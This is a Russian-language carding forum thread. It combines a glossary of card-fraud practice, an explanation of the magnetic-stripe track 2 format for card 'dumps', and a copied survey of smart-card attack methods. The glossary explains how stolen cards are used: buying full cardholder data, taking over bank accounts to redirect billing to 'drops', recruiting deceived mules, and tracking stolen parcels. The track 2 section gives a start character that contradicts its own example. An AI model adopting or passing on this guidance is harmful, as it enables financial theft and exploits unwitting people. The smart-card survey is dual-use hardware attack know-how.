    shipping address, шиппинг — адрес, куда магазин должен отправить заказанный товар. Для крупных покупок требуется, чтобы он совпадал с биллинг адресом или был вписан в банке в свойства карты именно как шиппинг, иначе будут

    траблы — trouble, проблема то есть. Траблы с шопом решаются

    прозвоном — т.е. звонком в магазин с подтверждением покупки, биллинг и шиппинг адресов и всяческой своей лояльности. Если траблы с английским или немецким языком, можно заказать услуги прозвонщика, который все это профессионально (по возможности) сделает. Прозвонщику нужно сказать всю информацию, которую потребует шоп при разговоре. В разных шопах она разная, но во всех спросят

    ордер (order) — номер заказа, сделанного на сайте. О чем договорились прозвонщик и шоп, можно узнать не только со слов прозвонщика, но и на сайте магазина через некоторое время. У ордера могут быть разные статусы в зависимости от магазина и используемого в нем софта. До прозвона дело может даже не дойти, если использовать

    энролл (enroll) — доступ к данным карты через сайт банка. Опять же, в каждом банке своя система. Где-то может понадобиться только

    MMN (mother’s maiden name) — девичья фамилией матери. Где-то вместе с

    DOB (date of birth) — датой рождения. Тде-то только

    SSN (social secure number) — индивидуальный номер налогоплательшика. Где-то комбинация вышеперечисленных с номером ПИН или даже с

    DL (driver’s license) — номером водительских прав. Обычно это секретная информация. Но ведь существует

    пробив — нахождение SSN, DOB, MMN, DL по различным базам данных. Пробивщик за денежку найдет данные почти на любого американца. Если время не позволяет озадачиваться пробивом или пробивщики все попропадали в оффлайн, можно купить

    фуллку (full info) — все данные кардхолдера, достаточные для регистрации энролла на сайте банка.
    Заэнроллив там карту, можно изменить биллинг телефон на свой, а биллиг адрес на адрес своего или чужого

    дропа — человека, согласного принять и переправить куда скажут купленный товар. Делает он это за деньги или красивые обещания, как получится. Вообще этой темой занимается

    дроповод — специалист по промыванию мозгов у дропов, чтобы они согласились работать с ворованным товаром. Но бывают не только

    разводные дропы — «развели как лоха», но и неразводные дропы. Это партнеры, которые знают, чем занимаются и активно содействуют. Как то ищут съемные квартиры, шлют сканы документов при необходимости, могут прозвонить шоп и т.д. Требуют себе большую долю, часто кидают, но работать с ними проще конечно.
     
  12. Alterego

    Alterego ElusiveVBV ProMarket

    Регистрация:
    3/10/16
    Сообщения:
    27
    Симпатии:
    15
    Репутация:
    25
    Так вот насчет ордера. Самый лучший и последний его статус:

    shipped — отправлено на шиппинг адрес. Если дроповод надежный и дропы у него стабильные, можно начинать плясать, уворовано успешно. Только нужно сообщить дроповоду

    трэк (tracking number) — уникальный номер посылки в почтово-курьерской службе, например в DHL, UPS или FedEx. Он появляется на сайте шопа в деталях ордера после отправки. По этому номеру можно отслеживать на сайте выбранной для отправки службы статус посылки, где она находится и что с ней происходит. Как только статус станет

    delivered — доставлено, ответственность за товар переходит к дроповоду и в ближайшие дни он заплатит за товар (по идее). Кстати, следите в каком городе то доставленно. А то бывает, что посылка обратно в шоп возвращается и delivered получается слегка не там, где ожидалось.

    Из негативных терминов canceled, declined, suspended, FBI, USSS, дроповод кинул.

    Желаю всем никогда с ними не сталкиваться, ну или хотя бы с минимальными потерями.

    Не путайте ДАМПЫ с СС!

    Итак, сейчас опишем что у нас должно быть написано на дорожке. Нас интересует вторая дорожка, и что же мы на ней можем увидеть?:

    Она может содержать до 40 символов:
    Сначала идет стартовый символ — %
    Потом идет PAN — до 19 цифр, в нашем случае это номер карты.

    В него входит код эмиттера карты (IIN: Issuer Identification Number) (до 6 символов), который в свою очередь состоит из:

    Основного промышленного индентификатора (MII: Major Industry Identifier) (до 2х символов):
    0: Зарезервированно для будущего использования стандартом ISO/TC 68.
    00: Не для выпуска карт
    1: Авиалинии.
    2: Авиалинии и для будущего использования.
    3: Путешествия и развлечения.
    4: Банк/финансы.
    5: Банк/финансы.
    59: Финансовые организации не попадающие в рамки ISO.
    6: Банки и мерчи.
    7: Топливная промышленность.
    8: Телекоммуникации и для будущего использования.
    89: Телекоммуникации и для часных агенств.
    9: Зарезервировано для национального использования.

    Далее идет код эммитера (II: Issuer Identifier),
    До 5 цифр, в некоторых случаях пишется длинна INN или его размер если он выходит за пределы ISO. Если MII равен 9 то первые три цифры — это код страны(для нас интереса не представляет)

    Потом идет индивидуальный номер аккаунта (IAI: Individual Account Identification)
    12 цифр, назначается организацией, выдавшей карту

    Затем идет одна цифра, используемая для проверки номера и прочей информации.
    PAN мастеркарда состоит из не более 16 символов, а у VISA — 13 или 16, включая проверочную цифру.

    Далее идет разделитель, один символ — =

    За ним слежует в некоторых случаях код страны(если PAN начинается с 59), он определяется в ISO 3166: 724 для Испании, 840 для USA и тд.

    Потом в большинстве случаев идет дата окончания действия карты в формате ГГММ(годмесяц).

    Затем идет трехсимвольный сервисный код, он состоит из:

    Первая цифра, определяет где можно использовать карту:
    0: Зарезервировано для будущего использования.
    1: Для международного использования.
    2: Для международного использования, с ограничениями.
    3: Зарезервировано для будущего использования.
    4: Зарезервировано для будущего использования.
    5: Только для внутреннего использования, кроме заранее оговоренных соглашений.
    6: Только для внутреннего использования, кроме заранее оговоренных соглашений, с ограничениями.
    7: Не для оплаты, кроме заранее оговоренных соглашений.
    8: Зарезервировано для будущего использования.
    9: Для проверки.
    Вторая цифра, определяет условия использования/авторизации карты(Authorization processing):
    0: Транзакции осуществляются по стандартным правилам.
    1: Зарезервировано для будущего использования.
    2: Транзакция осуществляется эммитером, должна быть онлайн.
    3: Зарезервировано для будущего использования.
    4: Транзакция осуществляется эммитером, должна быть онлайн, кроме заранее оговоренных соглашений.
    5: Зарезервировано для будущего использования.
    6: Зарезервировано для будущего использования.
    7: Зарезервировано для будущего использования.
    8: Зарезервировано для будущего использования.
    9: Зарезервировано для будущего использования.
    Третья цифра, определяет сервисы и условия требования PIN
    0: Без ограничений, нужен PIN.
    1: Без ограничений.
    2: Товары и услуги (не наличка).
    3: ATM только и нужен PIN.
    4: Только деньги.
    5: Товары и услуги (не наличка) и нужен PIN.
    6: Без ограничений, PIN по требованию.
    7: Товары и услуги (не наличка) и PIN по требованию.
    8: Зарезервировано для будущего использования.
    9: Зарезервировано для будущего использования.

    Потом идет хэш PVV (PIN Verification Value), 5 символов, за ним символы, зарезервируемые для использования эммитером. И в конце всего стоит завершающий символ — ?

    Пример второй дорожки(придуманный): ;4598530106131217=06081211834918387276?

    Обзор методов взлома смарт-карт

    Индустрия смарт-карт переживает период мощного расцвета. В 2002 году по всему миру было продано почти 2 миллиарда интеллектуальных карточек со встроенным микрочипом, а в ближайшие годы ожидается рост этих цифр в разы.
    Причины этого просты — области применения смарт-карт все время расширяются: от телефонной карты до жетона аутентификации пользователя ПК, от «электронного кошелька» для хранения цифровых наличных до цифрового паспорта-идентификатора. Массовое внедрение смарт-карт в повседневную жизнь сопровождается непременными заверениями официальных представителей индустрии о том, что чип-карты — это наиболее безопасная из существующих на сегодня технологий, которую сложно (читай — практически невозможно) вскрыть. Но мы с тобой знаем, что это вовсе не так :).
    Нравится это кому-то или нет, но вскрытие смарт-карт — явление весьма давнее и распространенное повсеместно. Как свидетельствуют специалисты, примерно с 1994 года практически все типы смарт-карточных чипов, использовавшихся в европейских, а затем в американских и азиатских системах платного телевидения, были успешно вскрыты крякерами при помощи методов обратной инженерной разработки. А добытые секреты карт (схема и ключевой материал) затем продавались на черном рынке в виде нелегальных клон-карт для просмотра закрытых ТВ-каналов на халяву.
    Менее освещено в прессе другое направление — подделка телефонных смарт-карт или электронных кошельков. Однако известно, что и в этой области далеко не все в порядке с противодействием взлому. Индустрии приходится регулярно заниматься обновлением технологий защиты процессора смарт-карт, крякеры в ответ разрабатывают более изощренные методы вскрытия, и так до бесконечности.

    Разновидности технологий

    Классификация методов вскрытия смарт-карт может несколько различаться у разных авторов, однако чаще всего выделяют следующие категории атак, которые обычно применяются в разных сочетаниях друг с другом.

    Технологии микрозондирования - с помощью микроскопа и иглы микропробника позволяет получить доступ непосредственно к поверхности чипа, где атакующий регистрирует прохождение информации (побитно), манипулирует процессами и вмешивается в работу интегральной схемы.
    Программные атаки- используют обычный коммуникационный интерфейс процессора смарт-карты и эксплуатирует уязвимости защиты, выявленные в протоколах, криптографических алгоритмах и других особенностях конкретной реализации схемы. Отмечу, что чем более зрелой является технология защиты, тем чаще приходится сочетать этот метод с другими методами атак.
    Анализ побочных каналов утечки информации- атакующий с высокой по времени частотой снимает аналоговые характеристики колебаний в питании и интерфейсных соединениях, а также любые другие электромагнитные излучения, порождаемые элементами схемы процессора (транзисторами, триггерами и т.п.) в ходе обычной работы.

    Технологии индуцирования сбоев- напротив, создаются нештатные условия эксплуатации, чтобы вызвать ошибки в работе процессора и открыть таким образом дополнительные каналы доступа к защищенной информации.

    Разрушающие атаки

    Типичный чиповый модуль смарт-карты имеет тонкое пластиковое основание размером порядка одного квадратного сантиметра с контактными зонами с обеих сторон. Одна сторона модуля видна на самой смарт-карте и контактирует со считывателем. Кремниевая матрица приклеена к другой стороне основания (подсоединение с помощью тонких золотых или алюминиевых проводов). Сторона пластины, где находится чип, покрыта эпоксидной смолой, и такой чиповый модуль вклеивается в карту.

    Вынуть чип из карты легко. Прежде умельцы вынимали с помощью острого ножа или ланцета, срезая пластик тыльной стороны карты до тех пор, пока не покажется эпоксидка. Позже стали быстро вынимать чип, просто разогревая пластмассу до мягкого состояния. Далее эпоксидный слой удаляется нанесением нескольких капель концентрированной азотной кислоты (более 98%). Прежде чем кислота успевает растворить слишком много эпоксидного слоя и затвердеть, кислоту и смолу смывают ацетоном. Процедура повторяется от 5 до 10 раз, пока полностью не покажется кремниевая матрица. Производить подобное надругательство над чипом необходимо аккуратно, чтобы не повредить соединительную проводку, тогда он останется работоспособным.
    Если процессор совершенно новый, придется создать карту его схем. Сейчас для этого обычно применяют оптический микроскоп и цифровую камеру, с помощью которых делают большую (размером в несколько метров) мозаику из снимков поверхности чипа высокого разрешения.

    У большинства чипов имеется защитный поверхностный слой (пассивация) из оксида или нитрата кремния, который предохраняет их от излучений оборудования и диффузии ионов. Азотная кислота на него не действует, поэтому для его удаления специалисты используют сложный метод сухого травления. Но это не единственная возможность для доступа к поверхности.
    Другим методом, особенно когда схема в целом известна, является использование игл-микропробников, которые с помощью ультразвуковой вибрации удаляют защитный слой непосредственно под точкой контакта. Кроме того, для локального удаления защитного слоя применяются лазерные резаки-микроскопы, используемые в лабораториях клеточной биологии.

    Описанная техника вскрытия, которую, я надеюсь, ты не опух читать, успешно применяется любителями-крякерами. Именно любителями, так как технологии, описанные дальше, доступны только хорошо оснащенным лабораториям, которые занимаются изучением полупроводников. В мире насчитываются сотни таких лабораторий (к примеру, в университетах и промышленных исследовательских центрах). Наиболее продвинутые крякеры арендуют эту технику.
    Исследование техники разрезания чипа ведет к более общей (и сравнительно менее изученной) проблеме — атакам, которые включают в себя активную модификацию исследуемого чипа, а не просто пассивное его исследование. К примеру, есть все основания полагать, что некоторые успешные атаки пиратов на систему платного телевидения проводились с использованием рабочих станций с фокусированием ионного пучка (Focused Ion Beam workstation — FIB). Такой аппарат может вырезать траки в металлизированном слое чипа и формировать новые траки или изолирующие слои. Кроме того, FIB может имплантировать ионы для изменения толщины слоя кремния и даже строить сквозные переходы к проводящим структурам в нижележащих слоях чипа. Такие аппараты стоят несколько миллионов долларов, но, как показывает практика, не слишком богатые злоумышленники арендуют дорогое оборудование на некоторое время у крупных полупроводниковых компаний.

    Обеспеченные таким инструментарием атаки на смарт-карты становятся более простыми и мощными. Типичная атака заключается в отсоединении от шины почти всех процессов ЦПУ, кроме памяти EEPROM и той компоненты ЦПУ, что генерирует доступ по чтению. Например, программный счетчик может быть оставлен подсоединенным таким образом, что области памяти по порядку становятся доступны на считывание по мере подачи тактовых импульсов.

    Как только это сделано, атакующему требуется лишь одна игла микропробника для считывания всего содержимого EEPROM. В результате процесс анализа становится более легким, чем при пассивном исследовании, когда обычно анализируется только трасса выполнения. Также это помогает избежать чисто механических трудностей одновременной работы с несколькими иглами-микропробниками на линиях шины, ширина которых составляет лишь несколько микрон.

    Технологии индуцирования сбоев (глич-атаки)

    В принципе, создателям вычислительной техники давно известно, что к инженерно-защищенным устройствам, типа смарт-карт, которые обычно малы и компактны, с целью вызова вычислительной ошибки можно применить некоторые уровни радиационного облучения или нагревания, подачу неправильного напряжения питания или нестандартную тактовую частоту. Известно также и то, что при возникновении сбоя в вычислениях компьютерное устройство может выдать информацию, полезную для восстановления секретных данных. Однако насколько серьезна эта угроза в действительности, долгое время мало кто подозревал.

    В конце сентября 1996 года коллектив авторов из Bellcore (научно-исследовательский центр американской компании Bell) сообщил о том, что обнаружена серьезная потенциальная слабость общего характера в защищенных криптографических устройствах, в частности, в смарт-картах для электронных платежей (D. Boneh, R.A. DeMillo, R.J. Lipton: «On the Importance of Checking Cryptographic Protocols for Faults», www.demillo.com/PDF/smart.pdf). Авторы назвали свой метод вскрытия «Криптоанализ при сбоях оборудования» (Cryptanalysis in the Presence of Hardware Faults).

    Суть же его в том, что, искусственно вызывая ошибку в работе электронной схемы с помощью ионизации или микроволнового облучения, а затем сравнивая сбойные значения на выходе устройства с заведомо правильными значениями, теоретически можно восстанавливать криптографическую информацию, хранящуюся в смарт-карте. Исследования ученых показали, что новой угрозе подвержены все устройства, использующие криптоалгоритмы с открытыми ключами для шифрования информации и аутентификации пользователя. Это могут быть смарт-карты, применяемые для хранения данных (например, электронных денег), SIM-карточки для сотовой телефонии, карточки, генерирующие электронные подписи или обеспечивающие аутентификацию пользователя при удаленном доступе к корпоративным сетям. Правда, разработанная в Bellcore атака была применима для вскрытия ключей исключительно в криптосхемах с открытым ключом — RSA, алгоритм цифровой подписи Рабина, схема идентификации Фиата-Шамира и т.д.

    Главным результатом публикации работы Bellcore стало то, что к известной в узком кругу проблеме было привлечено внимание гораздо большего числа исследователей. И меньше чем через месяц после появления статьи Бонэ-ДеМилло (в октябре 1996 года) стало известно о разработке аналогичной теоретической атаки в отношении симметричных криптоалгоритмов, то есть шифров закрытия данных с общим секретным ключом. Новый метод был разработан знаменитым тандемом израильских криптографов Эли Бихамом и Ади Шамиром, получив название «Дифференциальный анализ искажений» (сокращенно ДАИ).

    На примере самого распространенного блочного шифра DES эти авторы продемонстрировали, что в рамках той же «беллкоровской» модели сбоя в работе аппаратуры можно «вытащить» полный ключ DES из защищенной смарт-карты путем анализа менее 200 блоков шифртекста (блок DES — 8 байт). Более того, впоследствии появился еще ряд работ Бихама — Шамира с описанием методов извлечения ключа из смарт-карты в условиях, когда о реализованной внутри криптосхеме неизвестно практически ничего. Окончательную версию статьи с описанием этой работы утягивай с www.cs.technion.ac.il/users/wwwb/cgi-bin/tr-get.cgi/1997/CS/CS0910.revised.ps.
     
  13. Alterego

    Alterego ElusiveVBV ProMarket

    Регистрация:
    3/10/16
    Сообщения:
    27
    Симпатии:
    15
    Репутация:
    25
    Анализ побочных каналов утечки информации

    Летом 1998 года пришло известие еще об одном методе вскрытия смарт-карт, более чем успешно реализованном на практике. Совсем небольшая, состоящая из 4 человек консалтинговая криптофирма Cryptography Research из Сан-Франциско разработала чрезвычайно эффективный аналитический инструментарий для извлечения секретных ключей из криптографических устройств. Забавно, но, по словам главы фирмы Пола Кочера, исследователям «не удалось найти ни одной карты, которую нельзя было бы вскрыть».
    При этом Кочер по образованию биолог, а хакерством занимался с детства как хобби. Не исключено, что именно биологическое образование помогло ему выработать собственный стиль анализа «черных ящиков», относясь к ним как к живым организмам и внимательно исследуя все доступные признаки их «жизнедеятельности».
    Кочер и его коллеги, по сути, переизобрели секретные методы спецслужб и научились вскрывать защиту смарт-карт с помощью привлечения аппарата математической статистики и алгебраических методов исправления ошибок для анализа флуктуаций (небольшие колебания) в потреблении чипом электропитания. Делалось это примерно в течение полутора лет с 1996 по 1998 год, когда специалисты Cryptography Research выясняли, каким образом можно было бы повысить стойкость портативных криптографических жетонов, включая смарт-карты. Не предавая свои исследования широкой огласке, они знакомили сообщество производителей смарт-карт с разработанными в фирме видами атак, получившими названия «простой анализ питания» (ПАП) и «дифференциальный анализ питания» (ДАП). Если хочешь покопаться в этом направлении глубже, загляни по ссылочке www.cryptography.com/resources/whitepapers/DPA.html.

    Вполне очевидно, что такие методы анализа заслуживают самого серьезного внимания, поскольку атаки такого рода можно проводить быстро и используя уже готовое оборудование ценой от нескольких сотен до нескольких тысяч долларов. Базовые же концепции новой методики вскрытия сформулированы в более ранней и довольно известной работе Пола Кочера «Криптоанализ на основе таймерной атаки» (в 1995 году — www.cryptography.com/resources/whitepapers/TimingAttacks.pdf). В этой работе было продемонстрировано, что можно вскрывать криптоустройства, просто точно замеряя интервалы времени, которые требуются на обработку данных.

    Что же касается ПАП-атак, то здесь аналитик непосредственно наблюдает за динамикой потребления энергии системой. Количество расходуемой энергии изменяется в зависимости от выполняемой микропроцессором инструкции, а для точного отслеживания флуктуаций в потреблении питания можно использовать чувствительный амперметр. Так выявляются большие блоки инструкций (циклы DES, операции RSA и т.п.), поскольку эти операции, выполняемые процессором, имеют внутри себя существенно различающиеся по виду фрагменты. При большем усилении удается выделять и отдельные инструкции. В то время как ПАП-атаки главным образом строятся на визуальном анализе с целью выделения значимых флуктуаций питания, значительно более эффективный метод ДАП построен на статистическом анализе и технологиях исправления ошибок для выделения информации, имеющей корреляции с секретными ключами.

    Новые методы атак и считывания информации из памяти

    В июне 2002 года был обнародован еще один метод вскрытия смарт-карт и защищенных микроконтроллеров, получивший название «optical fault induction attack» («атака оптическим индуцированием сбоев» — www.cl.cam.ac.uk/~sps32/ches02-optofault.pdf). Этот класс атак был обнаружен и исследован в Кембриджском университете аспирантом Сергеем Скоробогатовым (кстати, выпускником МИФИ 1997 года) и его руководителем Россом Андерсоном.

    Суть метода в том, что сфокусированное освещение конкретного транзистора в электронной схеме стимулирует в нем проводимость, чем вызывается кратковременный сбой. Такого рода атаки оказываются довольно дешевыми и практичными, для них не требуется сложного и дорогого лазерного оборудования. Например, сами кембриджские исследователи в качестве мощного источника света использовали фотовспышку, купленную в магазине подержанных товаров за 20 фунтов стерлингов.

    Для иллюстрации мощи новой атаки была разработана методика, позволяющая с помощью вспышки и микроскопа выставлять в нужное значение (0 или 1) любой бит в SRAM-памяти микроконтроллера. Методом «оптического зондирования» (optical probing) можно индуцировать сбои в работе криптографических алгоритмов или протоколов, а также вносить искажения в поток управляющих команд процессора. Понятно, что перечисленные возможности существенно расширяют уже известные «сбойные» методы вскрытия криптосхем и извлечения секретной информации из смарт-карт.

    Индустрия, как обычно, пытается всячески принизить значимость нового метода вскрытия, поскольку он относится к классу разрушающих атак, сопровождающихся повреждением защитного слоя в чипе смарт-карты. Однако, по свидетельству Андерсона, злоумышленники могут обойтись и минимальным физическим вмешательством: кремний прозрачен в инфракрасном диапазоне, поэтому атаку можно проводить прямо через кремниевую подложку с задней стороны чипа, сняв лишь пластик. Используя же рентгеновское излучение, карту и вовсе можно оставить нетронутой.

    Меры противодействия

    Арсенал средств защиты смарт-карт на сегодняшний день весьма разнообразен. Разрушающим методам вскрытия могут противостоять емкостные датчики или оптические сенсоры под светонепроницаемой оболочкой (что крякеры давно научились обходить). Либо «специальный клей» — покрытие для чипов, которое не только непрозрачно и обладает проводимостью, но также надежно противостоит попыткам уничтожить его, обычно разрушая кремниевый слой, находящийся под ним. Такие покрытия относятся к федеральному стандарту США FIPS 140-1 и широко используются в американской военной промышленности, но повсеместно распространенными в быту их назвать нельзя.

    Ряд недорогих и эффективных методов противодействия «дифференциальному анализу питания (ДАП)» и «дифференциальному анализу искажений (ДАИ)» известен по разработкам Cryptography Research. В частности, созданы особые аппаратные и программные методы, обеспечивающие значительно меньший уровень утечек компрометирующей информации, внесение шума в измерения, декоррелирование (разделение взаимозависимостей) внутренних переменных и секретных параметров, а также декоррелирование по времени криптографических операций.
    Значительный ряд новых методов защиты предложен компьютерными лабораториями Лувена и Кембриджа (www.dice.ucl.ac.be/crypto, www.cl.cam.ac.uk/Research/Security/tamper/). Суть одного из них, например, заключается в замене традиционных электронных схем самосинхронизирующейся «двухрельсовой» (dual-rail) схемой, где логические 1 и 0 не кодируются, как обычно, импульсами высокого (H) и низкого (L) напряжения в единственном проводнике, а представляются парой импульсов (HL или LH) в двух проводниках. В этом случае появление «нештатной» пары импульсов вида (HH) сразу становится сигналом тревоги, приводящим, как правило, к перезагрузке процессора.
    Одно дело читать обо всех этих методах на бумаге и совсем другое — увидеть, как это работает реально. По свидетельству специалистов, открывающаяся картина действительно впечатляет. И стимулирует, конечно же, на поиск новых мер противодействия с еще большим рвением.

    Устройство смарт-карты

    Типичная смарт-карта — это 8-битный микропроцессор, постоянное запоминающее устройство (ROM), оперативная память (RAM), электрически перепрограммируемая память (EEPROM или FLASH, где, в частности, хранится криптографический ключевой материал), последовательные вход и выход. Все это хозяйство размещается в одном чипе, заключенном в корпус — обычно пластиковую карту размером с кредитку.

    Смарт-карты по своим потенциальным возможностям имеют целый ряд важных преимуществ по сравнению с другими технологиями. Обладая собственным процессором и памятью, они могут участвовать в криптографических протоколах обмена информацией, и, в отличие от карточек с магнитной полоской, здесь хранимые данные можно защищать от неавторизованного доступа. Беда лишь в том, что реальная стойкость этой защиты зачастую переоценивается.

    Далее будет представлен краткий обзор наиболее важных технологий, используемых при вскрытии смарт-карт. Эта информация важна для любого человека, желающего получить реальное представление о том, как происходит вскрытие защищенных устройств, и каких затрат это стоит. Естественно, тщательное изучение применяемых методов вскрытия позволяет вырабатывать адекватные контрмеры и создавать намного более эффективную защиту смарт-карт.

    Все технологии микрозондирования по сути своей являются разрушающими атаками. Это значит, что для их реализации требуются многие часы, иногда недели работы в условиях специализированной лаборатории, а сам исследуемый чип при этом разрушается. Остальные три категории относятся к неразрушающим атакам. Иначе говоря, после того, как злоумышленник подготовил такую атаку в отношении конкретного типа процессора и уже известной версии программного обеспечения, он может с легкостью воспроизвести ее в отношении любой другой карты того же типа. При этом атакуемая карта физически не повреждается, а оборудование, использованное для атаки, обычно можно замаскировать под обычный ридер (считыватель смарт-карт).

    Очевидно, что неразрушающие атаки особо опасны, поскольку не оставляют за собой следов. Но понятно и то, что сама природа атак такого рода подразумевает детальное знание процессора и программного обеспечения конкретной карты. С другой стороны, для разрушающих атак микрозондированием требуется очень мало исходных знаний о конкретной конструкции.
    Таким образом, атака на новую смарт-карту обычно начинается с разрушающей обратной инженерной разработки, результаты которой помогают создать более дешевые и быстрые неразрушающие атаки. В частности, именно такая последовательность событий многократно отмечена при вскрытии карт условного доступа в системах платного телевидения.

    К этому типу атак относят те, которые сопровождаются вскрытием корпуса устройства. Публичное представление таких методов, применяемых в крякерском подполье, впервые было сделано в 1996 году исследователями из Кембриджского университета Россом Андерсоном и Маркусом Куном в ходе второго семинара USENIX по электронной коммерции (Росс Андерсон, Маркус Кун «Стойкость к вскрытию. Предупреждение», www.cl.cam.ac.uk/~mgk25/tamper.html). Более подробно эти технологии описаны в совместной статье Куна и Оливера Кеммерлинга 1999 года «Принципы конструирования защищенных процессоров смарт-карт» (www.cl.cam.ac.uk/~mgk25/sc99-tamper.pdf), а также в последующей докторской диссертации Куна, которая, правда, в интернете не опубликована.

    В начале 1990-х годов в Кавендишской лаборатории Кембриджа была создана технология обратного восстановления схемы сложных кремниевых чипов, позволяющая аккуратно снимать слои микросхемы один за другим. Одно из примененных здесь новшеств — техника показа примесных N и Р слоев на основе эффекта Шоттки: тонкая пленка из золота или палладия накладывается на чип, образуя диод, который может быть виден в электронном луче. Изображения последовательных слоев чипа вводятся в компьютер, специальное программное обеспечение очищает первоначально нечеткие образы, выдает их ясное представление и распознает стандартные элементы чипа. Эта система была протестирована на процессоре Intel 80386 и ряде других устройств. Работа над восстановлением 80386 заняла две недели, причем для правильной реконструкции обычно требуется около шести образцов чипа. Результатом работ могут быть диаграммы масок и схем или даже список библиотечных ячеек, из которых чип был сконструирован.

    В условиях, когда конструкция и принципы функционирования чипа уже известны, существует очень мощная технология, разработанная в IВМ для исследования чипа в работе даже без удаления защитного слоя. Для измерения рабочих характеристик устройства над ним помещают кристалл ниобата лития. Показатель преломления этой субстанции изменяется при изменении электрического поля, и потенциал находящегося под ней кремния может считываться с помощью ультрафиолетового лазерного луча, проходящего через кристалл под скользящим углом наклона. Возможности этой технологии таковы, что можно считывать сигнал в 5 В с частотой до 25 МГц. По сути, это стандартный путь для хорошо оснащенных лабораторий при восстановлении криптоключей в чипах, конструкция которых известна.

    Чаще всего критика в адрес дифференциального анализа искажений (особенно со стороны выпускающих смарт-карты фирм) сводилась к тому, что вся эта методика носит сугубо теоретический характер. Ведь никто не продемонстрировал на практике, что сбойные ошибки можно вызывать именно в криптосхеме, причем конкретно в алгоритме разворачивания ключа.
    Но уже весной 1997 года появилось описание не теоретической, а весьма практичной атаки, получившей название «усовершенствованный метод ДАИ». Авторы атаки (кембриджский профессор Росс Андерсон и его аспирант из Германии Маркус Кун) продемонстрировали, что могут извлекать ключ из смарт-карты менее чем по 10 блокам шифртекста. В основу нового метода была положена модель принудительных искажений или «глич-атак» (от английского glitch — всплеск, выброс), реально практикуемых крякерами при вскрытии смарт-карт платного телевидения.
    Под глич-атаками понимаются манипуляции с тактовой частотой или напряжением питания смарт-карт, что позволяет выдавать дампы с ключевым материалом на порт выхода устройства. Эффективность глич-атак продемонстрирована кембриджскими авторами как на симметричных криптосхемах, так и на вскрытии алгоритмов с открытым ключом. Ссылки на соответствующие статьи дыбай на сайте Росса Андерсона — www.cl.cam.ac.uk/users/rja14/#Reliability.

    В традиционном анализе криптоустройств и защищенных протоколов принято предполагать, что входное и выходное сообщения доступны злоумышленнику, а какая-либо информация о ключах ему неизвестна. Однако любое электронное устройство состоит из конкретных элементов, выдающих в окружающую среду информацию о своей работе. А значит, на самом деле, атакующей стороне может быть доступна и всевозможная побочная информация, выдаваемая криптоустройством: электромагнитное излучение, сигналы об ошибках или об интервалах времени между выполняемыми инструкциями, колебания в потреблении электропитания и другие данные. Вообще, все это очень хорошо известно военным и спецслужбам, где разработаны специальные методы работы с побочными каналами утечки информации, но тема эта (под кодовым наименованием Tempest) строго засекречена и открытых публикаций о ней очень мало.

    Этими же специалистами из Кембриджа совместно с учеными компьютерной лаборатории Лувенского университета (Бельгия) недавно разработаны еще несколько новых методов считывания информации из защищенных чипов смарт-карт (David Samyde, Sergei Skorobogatov, Ross Anderson, Jean-Jacques Quisquater: On a New Way to Read Data from Memory — www.ftp.cl.cam.ac.uk/ftp/users/rja14/SISW02.pdf). Общим для данных методов является то, что они индуцируют поддающиеся замерам изменения в аналоговых характеристиках ячеек памяти.

    Например, сканируя ячейки сфокусированным лазером или наводя в них вихревые токи с помощью индуктивной спирали на игле микропробника, можно повысить электромагнитные утечки, выдающие записанное там значение бита, но при этом само это значение сохраняется в ячейке ненарушенным. Сильным охлаждением чипа в нужный момент времени можно «заморозить» содержимое интересующего регистра и считать из него (ключевую) информацию, обычно хранящуюся или передаваемую в зашифрованном виде. Эта технология применима к самым разным типам памяти от RAM до FLASH и реально продемонстрирована считыванием ключей DES из ячеек RAM без какого-либо физического контакта с чипом.

    Эта работа проведена учеными по заказу проекта Евросоюза G3Card и ставит перед собой цель создания смарт-карт следующего поколения, способных максимально противостоять современным атакам, вплоть до «полуразрушающих». Создание абсолютной защиты, естественно, не является реалистичным для устройств, применяемых в действительности, одно из главных достоинств которых — дешевизна.

    Разработкой мер защиты смарт-карт от вскрытия, конечно же, занимаются не только в университетах или маленьких фирмах, вроде Cryptography Research Пола Кочера или Advanced Digital Security Research Оливера Кеммерлинга. Большая работа ведется и непосредственно в смарт-карточной индустрии, где, правда, предпочитают в подробностях не распространяться на эту тему. Но иногда кое-какая информация все же просачивается.

    Так, в прошлом году на криптографической выставке-конференции RSA-2002 интереснейшая экспозиция была устроена компанией Datacard Group (www.datacard.com), специализирующейся на разработке смарт-карт. На своем выставочном стенде сотрудники фирмы развернули некий «полевой вариант» небольшой электронной лаборатории. Буквально на глазах изумленной публики демонстрировалось вскрытие смарт-карт с помощью описанных выше методов ДАП и ДАИ. Оборудования для этих работ требовалось совсем немного — осциллограф, компьютер.


    Ну в общем то и всё на этом. Всем спасибо, кто уделил внимание прочтению статьи, надеюсь для общего развития была полезна .